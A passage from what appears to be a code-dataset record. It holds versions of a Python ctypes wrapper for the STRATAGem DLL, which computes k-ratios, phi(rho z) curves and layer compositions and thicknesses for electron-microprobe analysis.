doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n 
logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not 
self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if 
kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. 
If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-5": "\"\"\"\nMain class of the interface.\nIt setups the experimental parameters such as the :class:`.Experiment`'s and\n:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of \n:math:`\\\\phi(\\\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and \nfluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).\n\"\"\"\n\n# Standard library modules.\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\n\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n class winreg:\n\n HKEY_CURRENT_USER = None\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n\n# Third party modules.\n\n# Local modules.\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import \\\n atomic_mass_kg_mol, mass_density_kg_m3\n\n# Globals and constants variables.\n_REGISTRY_KEY = \"Software\\SAMx\\Stratagem\\Configuration\"\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\n\nPRZMODE_XPP = 0\n\"\"\":math:`\\\\phi(\\\\rho z)` from XPP\"\"\"\n\nPRZMODE_PAP = 1\n\"\"\":math:`\\\\phi(\\\\rho z)` from PAP\"\"\"\n\nPRZMODE_GAU = 2\n\"\"\":math:`\\\\phi(\\\\rho z)` *unknown*, possibly two Gaussians\"\"\"\n\nFLUORESCENCE_NONE = 0\n\"\"\"No fluorescence\"\"\"\n\nFLUORESCENCE_LINE = 1\n\"\"\"Only characteristic fluorescence\"\"\"\n\nFLUORESCENCE_LINE_CONT = 2\n\"\"\"Characteristic and Bremsstrahlung fluorescence\"\"\"\n\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\ndef _check_key(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\SAMx\\Stratagem\\Configuration``. 
If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n\n cwd = os.getcwd()\n try:\n logger.debug(\"dll=%s\", dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd) # Change back to real cwd\n\n logger.debug(\"StEnableErrorDisplay(%r)\", display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {} # layer: index\n self._substrate = None\n self._experiments = {} # experiment: (element, line, kratio) indexes\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n\n logger.debug(\"StObjectNew(key, %r, %i)\", not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error(\"Cannot create object\")\n\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. 
Call close() first.')\n\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear() # layer: index\n self._substrate = None\n self._experiments.clear() # analyzed experiments\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = (sample.substrate, index)\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m,\n layer.mass_thickness_kg_m2, layer.density_kg_m3)\n\n return sample\n\n sample = property(get_sample, set_sample, doc=\"Property to set/get sample\")\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. 
\n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n\n logger.debug(\"StSdAddLayer(key)\")\n ilayer_ = self._lib.StSdGetNbLayers(key)\n\n logger.debug(\"StSdAddLayer(key, %i)\", ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error(\"Cannot add layer\")\n\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug(\"StSdAddElt(key, %i, %i)\", ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error(\"Cannot add element\")\n\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug(\"StSdSetNrAtom(key, %i, %i, %i)\", ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error(\"Cannot set atomic number\")\n\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n\n wf_ = c.c_double(wf)\n logger.debug(\"StSdSetConc(key, %i, %i, %f)\", ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error(\"Cannot set concentration\")\n\n logger.debug(\"StSdSetConcFlag(key, %i, %i, %i)\", ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):\n self._raise_error(\"Cannot set concentration flag\")\n\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1e3 # g/cm3\n else:\n density = 10.0\n density_ = c.c_double(density)\n\n if thick_known:\n thickness = layer.thickness_m * 1e10 # Angstroms\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n\n logger.debug(\"StSdSetThick(key, %i, %r, %d, %d, %d)\", ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error(\"Cannot set thickness\")\n\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n # Create new object\n key_ = self._stobjectnew(standard=True)\n\n # Set sample\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n\n # Save\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error(\"Cannot save standard\")\n\n # Delete object\n self._lib.StObjectDelete(key_)\n\n self._tmpstandards.append(filepath)\n\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. 
hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1e3)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,\n c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error(\"Cannot add atomic number and line\")\n\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):\n self._raise_error(\"Cannot set standard\")\n\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug(\"StEdSetAnalyzedFlag(key, %i, %r)\", ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error(\"Cannot add experiment analyzed flag\")\n\n kratio_ = c.c_double(experiment.kratio)\n logger.debug(\"StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)\",\n ielt_.value, iline_.value, iexpk_.value,\n experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,\n experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,\n hv_, hv_, kratio_, c.c_double(0.0),\n c.c_int(2)):\n self._raise_error(\"Cannot set experiment k-ratio\")\n\n if experiment.is_analyzed():\n indexes = (ielt_.value, iline_.value, iexpk_.value)\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error(\"Cannot set geometry parameters\")\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_),\n c.byref(tilt_), c.byref(azimuth_)):\n self._raise_error(\"Cannot get geometry parameters\")\n\n return toa_.value, tilt_.value, azimuth_.value\n\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n 
logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n\n prz_mode = property(get_prz_mode, set_prz_mode,\n doc='Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n\n fluorescence = property(get_fluorescence, set_fluorescence,\n doc='Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n\n standard_directory = property(get_standard_directory, set_standard_directory,\n doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer,\n thickness_low_m, thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing 